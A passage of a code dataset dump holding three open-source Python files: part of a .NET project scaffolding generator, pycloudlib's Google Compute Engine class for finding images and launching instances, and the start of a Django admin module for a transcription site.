'src',\n 'Program.cs')\n\n self.csharp_templater.HandleCSharpLogging(dotnet_service,api_program_path)\n def HandleDotnetApiDbContext(self, dotnet_service, api_copy_folder):\n dbcontext_path = os.path.join(api_copy_folder,\n 'src',\n 'Data',\n 'NameContext.cs')\n CamelCaseDbName = to_camelcase(dotnet_service['name']).replace('.','') + 'Context'\n if 'database' in dotnet_service:\n if os.path.exists(dbcontext_path):\n dbcontext_rename_path = os.path.join(api_copy_folder,\n 'src',\n 'Data',\n CamelCaseDbName+'.cs')\n shutil.copy(dbcontext_path, dbcontext_rename_path)\n os.remove(dbcontext_path)\n replaceDict = {\n 'NameContext': CamelCaseDbName\n }\n replace_template_file(dbcontext_rename_path,replaceDict)\n else:\n remove_data_folder_path = os.path.join(api_copy_folder,\n 'src',\n 'Data')\n shutil.rmtree(remove_data_folder_path)\n rm_files = ['migrations.sh','updatedb.sh','dropdb.sh','migrations.dev.sh','updatedb.dev.sh','dropdb.dev.sh']\n for rm_file in rm_files:\n rm_path = os.path.join(api_copy_folder,rm_file)\n os.remove(rm_path)\n docker_file = os.path.join(api_copy_folder,\n 'Dockerfile')\n filter_region_with_tag(docker_file,'database')\n \n def HandleDotnetApiNameSpaceAndCleaning(self, dotnet_service, api_copy_folder):\n src_path = os.path.join(api_copy_folder,'src')\n file_clean_paths = FindAllFilesWithExtensionInDirectory(src_path,('.cs','.csproj'))\n CamelCaseServiceName = to_camelcase(dotnet_service['name'])\n self.csharp_templater.ReplaceDotnetNameSpaces(file_clean_paths,'DotnetWebApi',CamelCaseServiceName)\n ClearRegionLines(file_clean_paths)\n def HandleDotnetApiDockerFile(self, dotnet_service, api_copy_folder):\n docker_file_path = os.path.join(api_copy_folder,'Dockerfile')\n docker_replace_dict = {}\n docker_replace_dict['{{port}}'] = str(dotnet_service['port'])\n docker_replace_dict['{{project_name}}'] = to_camelcase(dotnet_service['name'])\n replace_template_file(docker_file_path,docker_replace_dict)\n if 'database' in dotnet_service:\n ef_shell_replace_dict = 
{\n '{{ProjectName}}' : to_camelcase(dotnet_service['name']),\n '{{DatabaseContextName}}' : to_camelcase(dotnet_service['name']).replace('.','') + 'Context'\n }\n shell_file_paths = ['migrations.sh','updatedb.sh','dropdb.sh','migrations.dev.sh','updatedb.dev.sh','dropdb.dev.sh']\n for path in shell_file_paths:\n f_path = os.path.join(api_copy_folder,path)\n replace_template_file(f_path,ef_shell_replace_dict)\n\n def HandleDotnetApiDockerCompose(self, dotnet_service,api_copy_folder):\n docker_props = {\n 'image': dotnet_service['name'].lower(),\n 'build': {\n 'context': 'src/ApiServices/'+to_camelcase(dotnet_service['name'])+'/',\n 'dockerfile': 'Dockerfile'\n },\n 'restart': 'on-failure',\n 'ports': [],\n 'links': [],\n 'depends_on':[],\n 'networks':['localnet'], \n }\n if 'database' in dotnet_service:\n docker_props['links'].append(dotnet_service['database']['provider'])\n docker_props['depends_on'].append(dotnet_service['database']['provider'])\n if 'port' in dotnet_service:\n docker_props['ports'].append(str(dotnet_service['port'])+':'+str(dotnet_service['port']))\n eventbus_enabled = 'eventbus' in dotnet_service\n if eventbus_enabled:\n eb_provider = dotnet_service['eventbus']['provider'] \n docker_props['links'].append(eb_provider)\n docker_props['depends_on'].append(eb_provider)\n\n return docker_props\n ","repo_name":"DooMachine/MicroBoiler","sub_path":"microboiler/modules/services/dotnetapi.py","file_name":"dotnetapi.py","file_ext":"py","file_size_in_byte":12817,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"27519123534","text":"# This file is part of pycloudlib. See LICENSE file for license information.\n\"\"\"GCE Cloud type.\n\nThis is an initial implementation of the GCE class. It enables\nauthentication into the cloud, finding an image, and launching an\ninstance. 
However, it does not allow any further actions to be performed.\n\"\"\"\n\nimport logging\nimport os\nimport time\nfrom itertools import count\nfrom typing import Any, MutableMapping, Optional\n\nimport googleapiclient.discovery\n\nfrom pycloudlib.cloud import BaseCloud, ImageType\nfrom pycloudlib.config import ConfigFile\nfrom pycloudlib.errors import (\n CloudSetupError,\n ImageNotFoundError,\n PycloudlibError,\n)\nfrom pycloudlib.gce.instance import GceInstance\nfrom pycloudlib.gce.util import get_credentials, raise_on_error\nfrom pycloudlib.util import UBUNTU_RELEASE_VERSION_MAP, subp\n\nlogging.getLogger(\"googleapiclient.discovery\").setLevel(logging.WARNING)\n\n\nclass GCE(BaseCloud):\n \"\"\"GCE Cloud Class.\"\"\"\n\n _type = \"gce\"\n\n def __init__(\n self,\n tag: str,\n timestamp_suffix: bool = True,\n config_file: Optional[ConfigFile] = None,\n *,\n credentials_path: Optional[str] = None,\n project: Optional[str] = None,\n region: Optional[str] = None,\n zone: Optional[str] = None,\n service_account_email: Optional[str] = None,\n ):\n \"\"\"Initialize the connection to GCE.\n\n Args:\n tag: string used to name and tag resources with\n timestamp_suffix: bool set True to append a timestamp suffix to the\n tag\n config_file: path to pycloudlib configuration file\n credentials_path: path to credentials file for GCE\n project: GCE project\n region: GCE region\n zone: GCE zone\n service_account_email: service account to bind launched\n instances to\n \"\"\"\n super().__init__(\n tag,\n timestamp_suffix,\n config_file,\n required_values=[credentials_path, project],\n )\n\n self._log.debug(\"logging into GCE\")\n\n self.credentials_path = \"\"\n if credentials_path:\n self.credentials_path = credentials_path\n elif \"GOOGLE_APPLICATION_CREDENTIALS\" in os.environ:\n self.credentials_path = os.environ[\n \"GOOGLE_APPLICATION_CREDENTIALS\"\n ]\n elif \"credentials_path\" in self.config:\n self.credentials_path = os.path.expandvars(\n os.path.expanduser(self.config[\"credentials_path\"])\n )\n\n credentials = get_credentials(self.credentials_path)\n\n if not project:\n if \"project\" in self.config:\n project = self.config[\"project\"]\n elif \"GOOGLE_CLOUD_PROJECT\" in os.environ:\n project = os.environ[\"GOOGLE_CLOUD_PROJECT\"]\n else:\n command = [\"gcloud\", \"config\", \"get-value\", \"project\"]\n exception_text = (\n \"Could not obtain GCE project id. 
Set it in the \"\n \"pycloudlib config or setup the gcloud cli.\"\n )\n try:\n result = subp(command, rcs=())\n except FileNotFoundError as e:\n raise CloudSetupError(exception_text) from e\n if not result.ok:\n exception_text += \"\\nstdout: {}\\nstderr: {}\".format(\n result.stdout, result.stderr\n )\n raise CloudSetupError(exception_text)\n project = result.stdout\n\n # disable cache_discovery due to:\n # https://github.com/google/google-api-python-client/issues/299\n self.compute = googleapiclient.discovery.build(\n \"compute\",\n \"v1\",\n cache_discovery=False,\n credentials=credentials,\n )\n region = region or self.config.get(\"region\") or \"us-west2\"\n zone = zone or self.config.get(\"zone\") or \"a\"\n self.project = project\n self.region = region\n self.zone = \"%s-%s\" % (region, zone)\n self.instance_counter = count()\n self.service_account_email = service_account_email or self.config.get(\n \"service_account_email\"\n )\n\n def released_image(\n self, release, *, image_type: ImageType = ImageType.GENERIC, **kwargs\n ):\n \"\"\"ID of the latest released image for a particular release.\n\n Args:\n release: The release to look for\n\n Returns:\n A single string with the latest released image ID for the\n specified release.\n \"\"\"\n return self.daily_image(release=release, image_type=image_type)\n\n def _get_project(self, image_type: ImageType):\n return (\n \"ubuntu-os-cloud-devel\"\n if image_type == ImageType.GENERIC\n else \"ubuntu-os-pro-cloud\"\n )\n\n def _get_name_filter(self, release: str, image_type: ImageType):\n if image_type == ImageType.GENERIC:\n return \"daily-ubuntu-{}-{}-*\".format(\n UBUNTU_RELEASE_VERSION_MAP[release].replace(\".\", \"\"), release\n )\n\n if image_type == ImageType.PRO:\n return \"ubuntu-pro-{}-{}-*\".format(\n UBUNTU_RELEASE_VERSION_MAP[release].replace(\".\", \"\"), release\n )\n\n if image_type == ImageType.PRO_FIPS:\n return \"ubuntu-pro-fips-{}-{}-*\".format(\n UBUNTU_RELEASE_VERSION_MAP[release].replace(\".\", \"\"), release\n )\n\n raise ValueError(\"Invalid image_type: {}\".format(image_type.value))\n\n def _query_image_list(\n self, release: str, project: str, name_filter: str, arch: str\n ):\n \"\"\"Query full list of images.\n\n image list API docs:\n https://googleapis.github.io/google-api-python-client/docs/dyn/compute_v1.images.html#list\n\n The image list API doesn't allow filtering and sorting in one request\n so we need to do one of those locally.\n Filtering via the API results in fewer requests on average than\n sorting via the API.\n So we filter via the API and loop through all pages to get the full\n image list matching that filter.\n 500 is the maximum allowed page size\n Then we can sort locally and grab the latest image.\n\n Args:\n release: string, Ubuntu release to look for\n project: GCE project\n name_filter: name to filter with\n arch: images' architecture\n\n Returns:\n list of images matching the given filters\n \"\"\"\n filter_string = \"(name={}) AND (architecture={})\".format(\n name_filter, arch.upper()\n )\n\n # SPECIAL CASE\n # Google didn't start including architecture in image descriptions\n # until after xenial stopped getting published\n # All xenial images are x86_64, so:\n # 1. we can return early for non-x86_64 xenial queries\n # 2. 
for xenial + x86_64 we don't include the architecture in the\n # filter\n if release == \"xenial\":\n if arch != \"x86_64\":\n return []\n filter_string = \"name={}\".format(name_filter)\n\n image_list = []\n page_token = \"\"\n reqs = 0\n while page_token is not None:\n image_list_result = (\n self.compute.images()\n .list(\n project=project,\n filter=filter_string,\n maxResults=500,\n pageToken=page_token,\n )\n .execute()\n )\n reqs += 1\n image_list += image_list_result.get(\"items\", [])\n page_token = image_list_result.get(\"nextPageToken\", None)\n\n self._log.debug(\n (\n 'Fetched entire image list (%i results) matching \"%s\" in %i'\n \" requests\"\n ),\n len(image_list),\n filter_string,\n reqs,\n )\n\n return image_list\n\n def daily_image(\n self,\n release: str,\n *,\n arch: str = \"x86_64\",\n image_type: ImageType = ImageType.GENERIC,\n **kwargs,\n ):\n \"\"\"Find the id of the latest image for a particular release.\n\n Args:\n release: string, Ubuntu release to look for\n\n Returns:\n string, path to latest daily image\n\n \"\"\"\n self._log.debug(\n \"finding daily Ubuntu image for arch: %s and release: %s\",\n arch,\n release,\n )\n project = self._get_project(image_type=image_type)\n name_filter = self._get_name_filter(\n release=release, image_type=image_type\n )\n\n image_list = self._query_image_list(\n release, project, name_filter, arch\n )\n\n if not image_list:\n msg = (\n \"Could not find {} image for arch: {} and release: {}\".format(\n image_type.value,\n arch,\n release,\n )\n )\n self._log.warning(msg)\n raise ImageNotFoundError(\n image_type=image_type.value, arch=arch, release=release\n )\n\n image = sorted(image_list, key=lambda x: x[\"creationTimestamp\"])[-1]\n self._log.debug(\n 'Found image name \"%s\" for arch \"%s\"',\n image[\"name\"],\n arch,\n )\n return \"projects/{}/global/images/{}\".format(project, image[\"id\"])\n\n def image_serial(self, image_id):\n \"\"\"Find the image serial of the latest daily image for a particular release.\n\n Args:\n image_id: string, Ubuntu image id\n\n Returns:\n string, serial of latest image\n\n \"\"\"\n raise NotImplementedError\n\n def delete_image(self, image_id, **kwargs):\n \"\"\"Delete an image.\n\n Args:\n image_id: string, id of the image to delete\n \"\"\"\n try:\n api_image_id = (\n self.compute.images()\n .get(project=self.project, image=os.path.basename(image_id))\n .execute()[\"id\"]\n )\n except googleapiclient.errors.HttpError as e:\n if \"was not found\" not in str(e):\n raise\n return\n response = (\n self.compute.images()\n .delete(\n project=self.project,\n image=api_image_id,\n )\n .execute()\n )\n\n raise_on_error(response)\n\n def get_instance(\n self,\n instance_id,\n name=None,\n *,\n username: Optional[str] = None,\n **kwargs,\n ):\n \"\"\"Get an instance by id.\n\n Args:\n instance_id: The instance ID returned upon creation\n username: username to use when connecting via SSH\n\n Returns:\n An instance object to use to manipulate the instance further.\n\n \"\"\"\n return GceInstance(\n self.key_pair,\n instance_id,\n self.project,\n self.zone,\n self.credentials_path,\n name=name,\n username=username,\n )\n\n def launch(\n self,\n image_id,\n instance_type=\"n1-standard-1\",\n user_data=None,\n *,\n username: Optional[str] = None,\n **kwargs,\n ):\n \"\"\"Launch instance on GCE and print the IP address.\n\n Args:\n image_id: string, image ID for instance to use\n instance_type: string, instance type to launch\n user_data: string, user-data to pass to instance\n username: username to use 
when connecting via SSH\n kwargs: other named arguments to add to instance JSON\n Raises: ValueError on invalid image_id\n \"\"\"\n if not image_id:\n raise ValueError(\n f\"{self._type} launch requires image_id param.\"\n f\" Found: {image_id}\"\n )\n instance_name = \"i{}-{}\".format(next(self.instance_counter), self.tag)\n config: MutableMapping[str, Any] = {\n \"name\": instance_name,\n \"machineType\": \"zones/%s/machineTypes/%s\"\n % (self.zone, instance_type),\n \"disks\": [\n {\n \"boot\": True,\n \"autoDelete\": True,\n \"initializeParams\": {\n \"sourceImage\": image_id,\n },\n }\n ],\n \"networkInterfaces\": [\n {\n \"network\": \"global/networks/default\",\n \"accessConfigs\": [\n {\"type\": \"ONE_TO_ONE_NAT\", \"name\": \"External NAT\"}\n ],\n }\n ],\n \"metadata\": {\n \"items\": [\n {\n \"key\": \"ssh-keys\",\n \"value\": \"ubuntu:%s\"\n % self.key_pair.public_key_content,\n }\n ]\n },\n }\n\n if self.service_account_email:\n config[\"serviceAccounts\"] = [{\"email\": self.service_account_email}]\n\n if user_data:\n user_metadata = {\"key\": \"user-data\", \"value\": user_data}\n config[\"metadata\"][\"items\"].append(user_metadata)\n\n operation = (\n self.compute.instances()\n .insert(project=self.project, zone=self.zone, body=config)\n .execute()\n )\n raise_on_error(operation)\n\n result = (\n self.compute.instances()\n .get(\n project=self.project,\n zone=self.zone,\n instance=instance_name,\n )\n .execute()\n )\n raise_on_error(result)\n\n instance = self.get_instance(\n result[\"id\"], name=result[\"name\"], username=username\n )\n self.created_instances.append(instance)\n return instance\n\n def snapshot(self, instance: GceInstance, clean=True, **kwargs):\n \"\"\"Snapshot an instance and generate an image from it.\n\n Args:\n instance: Instance to snapshot\n clean: run instance clean method before taking snapshot\n\n Returns:\n An image id\n \"\"\"\n response = (\n self.compute.disks()\n .list(project=self.project, zone=self.zone)\n .execute()\n )\n\n instance_disks = [\n disk for disk in response[\"items\"] if disk[\"name\"] == instance.name\n ]\n\n if len(instance_disks) > 1:\n raise PycloudlibError(\n \"Snapshotting an image with multiple disks not supported\"\n )\n\n instance.shutdown()\n\n snapshot_name = \"{}-image\".format(instance.name)\n operation = (\n self.compute.images()\n .insert(\n project=self.project,\n body={\n \"name\": snapshot_name,\n \"sourceDisk\": instance_disks[0][\"selfLink\"],\n },\n )\n .execute()\n )\n raise_on_error(operation)\n self._wait_for_operation(operation)\n\n image_id = \"projects/{}/global/images/{}\".format(\n self.project, snapshot_name\n )\n self.created_images.append(image_id)\n return image_id\n\n def _wait_for_operation(\n self, operation, operation_type=\"global\", sleep_seconds=300\n ):\n response = None\n kwargs = {\"project\": self.project, \"operation\": operation[\"name\"]}\n if operation_type == \"zone\":\n kwargs[\"zone\"] = self.zone\n api = self.compute.zoneOperations()\n else:\n api = self.compute.globalOperations()\n for _ in range(sleep_seconds):\n try:\n response = api.get(**kwargs).execute()\n except ConnectionResetError:\n # This exception is known to be raised by GCE every so often:\n # https://github.com/canonical/pycloudlib/issues/101.\n response = {\n \"status\": \"ConnectionResetError\",\n \"statusMessage\": \"n/a\",\n }\n else:\n if response[\"status\"] == \"DONE\":\n break\n time.sleep(1)\n else:\n raise PycloudlibError(\n \"Expected DONE state, but found {} after waiting {} seconds. 
\"\n \"Check GCE console for more details. \\n\"\n \"Status message: {}\".format(\n response[\"status\"],\n sleep_seconds,\n response[\"statusMessage\"],\n )\n )\n","repo_name":"canonical/pycloudlib","sub_path":"pycloudlib/gce/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":16835,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"40718399478","text":"import logging\nfrom urllib.parse import urljoin\n\nfrom django.conf import settings\nfrom django.contrib import admin, messages\nfrom django.contrib.admin.models import CHANGE, LogEntry\nfrom django.contrib.admin.options import get_content_type_for_model\nfrom django.contrib.auth import get_permission_codename\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.decorators import permission_required\nfrom django.contrib.auth.models import User\nfrom django.db.models import Count\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render\nfrom django.template.defaultfilters import truncatechars\nfrom django.template.response import TemplateResponse\nfrom django.urls import path, reverse\nfrom django.utils.decorators import method_decorator\nfrom django.utils.html import format_html\nfrom django.views.decorators.csrf import csrf_protect\nfrom django_admin_multiple_choice_list_filter.list_filters import (\n MultipleChoiceListFilter,\n)\nfrom tabular_export.admin import export_to_csv_action, export_to_excel_action\nfrom tabular_export.core import export_to_csv_response, flatten_queryset\n\nfrom exporter import views as exporter_views\nfrom importer.tasks import import_items_into_project_from_url\n\nfrom ..models import (\n Asset,\n AssetTranscriptionReservation,\n Banner,\n Campaign,\n CampaignRetirementProgress,\n CarouselSlide,\n Item,\n Project,\n Resource,\n ResourceFile,\n SimpleContentBlock,\n SimplePage,\n SiteReport,\n Tag,\n Topic,\n Transcription,\n UserAssetTagCollection,\n UserProfileActivity,\n)\nfrom ..tasks import retire_campaign\nfrom ..views import ReportCampaignView\nfrom .actions import (\n anonymize_action,\n change_status_to_completed,\n change_status_to_in_progress,\n change_status_to_needs_review,\n publish_action,\n publish_item_action,\n unpublish_action,\n unpublish_item_action,\n)\nfrom .filters import (\n AcceptedFilter,\n AssetCampaignListFilter,\n AssetCampaignStatusListFilter,\n AssetProjectListFilter2,\n ItemCampaignListFilter,\n ItemCampaignStatusListFilter,\n ItemProjectListFilter2,\n OcrGeneratedFilter,\n OcrOriginatedFilter,\n ProjectCampaignListFilter,\n ProjectCampaignStatusListFilter,\n RejectedFilter,\n ResourceCampaignListFilter,\n ResourceCampaignStatusListFilter,\n SiteReportCampaignListFilter,\n SiteReportSortedCampaignListFilter,\n SubmittedFilter,\n TagCampaignListFilter,\n TagCampaignStatusListFilter,\n TranscriptionCampaignListFilter,\n TranscriptionCampaignStatusListFilter,\n TranscriptionProjectListFilter,\n UserAssetTagCollectionCampaignStatusListFilter,\n UserProfileActivityCampaignListFilter,\n UserProfileActivityCampaignStatusListFilter,\n)\nfrom .forms import (\n AdminItemImportForm,\n BleachedDescriptionAdminForm,\n CampaignAdminForm,\n ProjectAdminForm,\n SimpleContentBlockAdminForm,\n)\n\n\nclass ProjectListFilter(MultipleChoiceListFilter):\n title = \"Project\"\n\n def lookups(self, request, model_admin):\n choices = Project.objects.values_list(\"pk\", \"title\")\n return tuple(choices)\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass 
AssetProjectListFilter(ProjectListFilter):\n parameter_name = \"item__project__in\"\n\n\nclass ItemProjectListFilter(ProjectListFilter):\n parameter_name = \"project__in\"\n\n\nclass ConcordiaUserAdmin(UserAdmin):\n list_display = UserAdmin.list_display + (\"date_joined\", \"transcription_count\")\n\n def get_queryset(self, request):\n qs = super().get_queryset(request)\n qs = qs.annotate(Count(\"transcription\"))\n return qs\n\n @admin.display(ordering=\"transcription__count\")\n def transcription_count(self, obj):\n return obj.transcription__count\n\n EXPORT_FIELDS = (\n \"username\",\n \"email\",\n \"first_name\",\n \"last_name\",\n \"is_active\",\n \"is_staff\",\n \"is_superuser\",\n \"date_joined\",\n \"last_login\",\n \"transcription__count\",\n )\n\n def export_users_as_csv(self, request, queryset):\n return export_to_csv_action(\n self, request, queryset, field_names=self.EXPORT_FIELDS\n )\n\n def export_users_as_excel(self, request, queryset):\n return export_to_excel_action(\n self, request, queryset, field_names=self.EXPORT_FIELDS\n )\n\n actions = (anonymize_action, export_users_as_csv, export_users_as_excel)\n\n\nadmin.site.unregister(User)\nadmin.site.register(User, ConcordiaUserAdmin)\n\n\n@admin.register(Banner)\nclass BannerAdmin(admin.ModelAdmin):\n list_display = (\n \"text\",\n \"active\",\n )\n\n\nclass CustomListDisplayFieldsMixin:\n \"\"\"\n Mixin which provides some custom text formatters for list display fields\n used on multiple models\n \"\"\"\n\n @admin.display(description=\"Description\")\n def truncated_description(self, obj):\n return truncatechars(obj.description, 200)\n\n @admin.display(description=\"Metadata\")\n def truncated_metadata(self, obj):\n if obj.metadata:\n return format_html(\"{}\", truncatechars(obj.metadata, 200))\n else:\n return \"\"\n\n\n@admin.register(Campaign)\nclass CampaignAdmin(admin.ModelAdmin, CustomListDisplayFieldsMixin):\n form = CampaignAdminForm\n\n list_display = (\n \"title\",\n \"status\",\n \"published\",\n \"unlisted\",\n \"display_on_homepage\",\n \"ordering\",\n \"launch_date\",\n \"completed_date\",\n )\n list_editable = (\n \"display_on_homepage\",\n \"ordering\",\n \"published\",\n \"unlisted\",\n \"status\",\n \"launch_date\",\n \"completed_date\",\n )\n list_display_links = (\"title\",)\n prepopulated_fields = {\"slug\": (\"title\",)}\n search_fields = [\"title\", \"description\"]\n list_filter = (\"published\", \"display_on_homepage\", \"unlisted\", \"status\")\n\n actions = (publish_action, unpublish_action)\n\n def get_urls(self):\n urls = super().get_urls()\n\n app_label = self.model._meta.app_label\n model_name = self.model._meta.model_name\n\n custom_urls = [\n path(\n \"exportCSV/\",\n exporter_views.ExportCampaignToCSV.as_view(),\n name=f\"{app_label}_{model_name}_export-csv\",\n ),\n path(\n \"exportBagIt/\",\n exporter_views.ExportCampaignToBagIt.as_view(),\n name=f\"{app_label}_{model_name}_export-bagit\",\n ),\n path(\n \"report/\",\n ReportCampaignView.as_view(),\n name=f\"{app_label}_{model_name}_report\",\n ),\n path(\n \"retire/\",\n self.admin_site.admin_view(self.retire),\n name=f\"{app_label}_{model_name}_retire\",\n ),\n ]\n\n return custom_urls + urls\n\n @method_decorator(csrf_protect)\n @method_decorator(permission_required(\"concordia.retire_campaign\"))\n @method_decorator(permission_required(\"concordia.delete_project\"))\n @method_decorator(permission_required(\"concordia.delete_item\"))\n @method_decorator(permission_required(\"concordia.delete_asset\"))\n 
@method_decorator(permission_required(\"concordia.delete_transcription\"))\n @method_decorator(permission_required(\"concordia.delete_import_item_asset\"))\n def retire(self, request, campaign_slug):\n try:\n campaign = Campaign.objects.filter(slug=campaign_slug)[0]\n except IndexError:\n return self._get_obj_does_not_exist_redirect(\n request, self.opts, campaign_slug\n )\n\n projects = campaign.project_set.values_list(\"id\", flat=True)\n items = Item.objects.filter(project__id__in=projects).values_list(\n \"id\", flat=True\n )\n assets = Asset.objects.filter(item__id__in=items).values_list(\"id\", flat=True)\n transcriptions = Transcription.objects.filter(asset__id__in=assets)\n\n model_count = {\n \"project\": len(projects),\n \"item\": len(items),\n \"asset\": len(assets),\n \"transcription\": transcriptions.count(),\n }\n\n if request.POST:\n # This means the user confirmed the retirement\n obj_display = str(campaign)\n self.log_retirement(request, campaign, obj_display)\n progress = retire_campaign(campaign.id)\n self.message_user(\n request,\n 'The retirement process for %(name)s \"%(obj)s\" has begun.'\n % {\n \"name\": self.opts.verbose_name,\n \"obj\": obj_display,\n },\n messages.SUCCESS,\n )\n post_url = reverse(\n \"admin:concordia_campaignretirementprogress_change\",\n args=[progress.id],\n current_app=self.admin_site.name,\n )\n return HttpResponseRedirect(post_url)\n\n context = {\n **self.admin_site.each_context(request),\n \"title\": \"Are you sure?\",\n \"subtitle\": None,\n \"object_name\": \"Campaign\",\n \"object\": campaign,\n \"model_count\": model_count.items(),\n \"opts\": self.opts,\n \"app_label\": self.opts.app_label,\n \"preserved_filters\": self.get_preserved_filters(request),\n }\n\n return TemplateResponse(\n request, \"admin/concordia/campaign/retire.html\", context\n )\n\n def log_retirement(self, request, obj, object_repr):\n return LogEntry.objects.log_action(\n user_id=request.user.pk,\n content_type_id=get_content_type_for_model(obj).pk,\n object_id=obj.pk,\n object_repr=object_repr,\n action_flag=CHANGE,\n )\n\n\n@admin.register(Resource)\nclass ResourceAdmin(admin.ModelAdmin, CustomListDisplayFieldsMixin):\n list_display = (\"campaign\", \"topic\", \"sequence\", \"title\", \"resource_url\")\n list_display_links = (\"campaign\", \"topic\", \"sequence\", \"title\")\n list_filter = (\n \"resource_type\",\n ResourceCampaignStatusListFilter,\n ResourceCampaignListFilter,\n \"title\",\n )\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == \"campaign\":\n kwargs[\"queryset\"] = Campaign.objects.order_by(\"title\")\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n\n\n@admin.register(ResourceFile)\nclass ResourceFileAdmin(admin.ModelAdmin):\n # Bulk delete bypasses file deletion, so we don't want any bulk actions\n actions = None\n list_display = (\"name\", \"resource_url\", \"updated_on\")\n readonly_fields = (\"resource_url\", \"updated_on\")\n\n def resource_url(self, obj):\n # Boto3 adds a querystring parameters to the URL to allow access\n # to private files. 
In this case, all files are public, and we\n # don't want the querystring, so we remove it.\n # This looks hacky, but seems to be the least hacky way to do\n # this without a third-party library.\n return obj.resource.url.split(\"?\")[0]\n\n def get_fields(self, request, obj=None):\n # We don't want to display the resource field except during\n # creation, since uploading a new file will leave behind the original\n # as an orphan.\n if obj:\n return (\n \"name\",\n \"resource_url\",\n \"resource\",\n \"updated_on\",\n )\n return (\"name\", \"resource\")\n\n\n@admin.register(Topic)\nclass TopicAdmin(admin.ModelAdmin):\n form = BleachedDescriptionAdminForm\n\n list_display = (\n \"id\",\n \"title\",\n \"slug\",\n \"short_description\",\n \"published\",\n \"unlisted\",\n \"ordering\",\n )\n\n list_display_links = (\"id\", \"title\", \"slug\")\n prepopulated_fields = {\"slug\": (\"title\",)}\n\n\n@admin.register(Project)\nclass ProjectAdmin(admin.ModelAdmin, CustomListDisplayFieldsMixin):\n form = ProjectAdminForm\n\n # todo: add foreignKey link for campaign\n list_display = (\"id\", \"title\", \"slug\", \"campaign\", \"published\", \"ordering\")\n list_editable = (\"ordering\",)\n list_display_links = (\"id\", \"title\", \"slug\")\n prepopulated_fields = {\"slug\": (\"title\",)}\n search_fields = [\"title\", \"campaign__title\"]\n list_filter = (\n \"published\",\n \"topics\",\n ProjectCampaignStatusListFilter,\n ProjectCampaignListFilter,\n )\n\n actions = (publish_action, unpublish_action)\n\n def lookup_allowed(self, key, value):\n if key in (\"campaign__id__exact\"):\n return True\n else:\n return super().lookup_allowed(key, value)\n\n def get_urls(self):\n urls = super().get_urls()\n\n app_label = self.model._meta.app_label\n model_name = self.model._meta.model_name\n\n custom_urls = [\n path(\n \"<path:object_id>/item-import/\",\n self.admin_site.admin_view(self.item_import_view),\n name=f\"{app_label}_{model_name}_item-import\",\n )\n ]\n\n return custom_urls + urls\n\n @method_decorator(permission_required(\"concordia.add_campaign\"))\n @method_decorator(permission_required(\"concordia.change_campaign\"))\n @method_decorator(permission_required(\"concordia.add_project\"))\n @method_decorator(permission_required(\"concordia.change_project\"))\n @method_decorator(permission_required(\"concordia.add_item\"))\n @method_decorator(permission_required(\"concordia.change_item\"))\n def item_import_view(self, request, object_id):\n project = get_object_or_404(Project, pk=object_id)\n\n if request.method == \"POST\":\n form = AdminItemImportForm(request.POST)\n\n if form.is_valid():\n import_url = form.cleaned_data[\"import_url\"]\n\n import_job = import_items_into_project_from_url(\n request.user, project, import_url\n )\n else:\n form = AdminItemImportForm()\n import_job = None\n\n media = self.media\n\n context = {\n **self.admin_site.each_context(request),\n \"app_label\": self.model._meta.app_label,\n \"add\": False,\n \"change\": False,\n \"save_as\": False,\n \"save_on_top\": False,\n \"opts\": self.model._meta,\n \"title\": f\"Import Items into “{project.title}”\",\n \"object_id\": object_id,\n \"original\": project,\n \"media\": media,\n \"preserved_filters\": self.get_preserved_filters(request),\n \"is_popup\": False,\n \"has_view_permission\": True,\n \"has_add_permission\": True,\n \"has_change_permission\": True,\n \"has_delete_permission\": False,\n \"has_editable_inline_admin_formsets\": False,\n \"project\": project,\n \"form\": form,\n \"import_job\": import_job,\n }\n\n return 
render(request, \"admin/concordia/project/item_import.html\", context)\n\n\n@admin.register(Item)\nclass ItemAdmin(admin.ModelAdmin):\n list_display = (\"title\", \"item_id\", \"campaign_title\", \"project\", \"published\")\n list_display_links = (\"title\", \"item_id\")\n search_fields = [\n \"title\",\n \"item_id\",\n \"item_url\",\n \"project__campaign__title\",\n \"project__title\",\n ]\n\n list_filter = (\n \"published\",\n \"project__topics\",\n ItemCampaignStatusListFilter,\n ItemCampaignListFilter,\n ItemProjectListFilter2,\n )\n\n actions = (publish_item_action, unpublish_item_action)\n\n def lookup_allowed(self, key, value):\n if key in (\"project__campaign__id__exact\"):\n return True\n else:\n return super().lookup_allowed(key, value)\n\n def get_deleted_objects(self, objs, request):\n if len(objs) < 30:\n deleted_objects = [str(obj) for obj in objs]\n else:\n deleted_objects = [str(obj) for obj in objs[:3]]\n deleted_objects.append(\n f\"… and {len(objs) - 3} more {Item._meta.verbose_name_plural}\"\n )\n perms_needed = set()\n for model in (Item, Asset, Transcription):\n perm = \"%s.%s\" % (\n model._meta.app_label,\n get_permission_codename(\"delete\", model._meta),\n )\n if not request.user.has_perm(perm):\n perms_needed.add(model._meta.verbose_name)\n protected = []\n\n model_count = {\n Item._meta.verbose_name_plural: len(objs),\n Asset._meta.verbose_name_plural: Asset.objects.filter(\n item__in=objs\n ).count(),\n Transcription._meta.verbose_name_plural: Transcription.objects.filter(\n asset__item__in=objs\n ).count(),\n }\n\n return (deleted_objects, model_count, perms_needed, protected)\n\n def get_queryset(self, request):\n qs = super().get_queryset(request)\n qs = qs.select_related(\"project\", \"project__campaign\")\n return qs\n\n def campaign_title(self, obj):\n return obj.project.campaign.title\n\n\n@admin.register(AssetTranscriptionReservation)\nclass AssetTranscriptionReservationAdmin(\n admin.ModelAdmin, CustomListDisplayFieldsMixin\n):\n list_display = (\n \"created_on\",\n \"updated_on\",\n \"asset\",\n \"reservation_token\",\n \"tombstoned\",\n )\n list_display_links = (\"reservation_token\", \"created_on\")\n readonly_fields = (\"asset\", \"created_on\", \"updated_on\")\n\n\n@admin.register(Asset)\nclass AssetAdmin(admin.ModelAdmin, CustomListDisplayFieldsMixin):\n list_display = (\n \"published\",\n \"transcription_status\",\n \"item_id\",\n \"year\",\n \"sequence\",\n \"difficulty\",\n \"truncated_media_url\",\n \"media_type\",\n 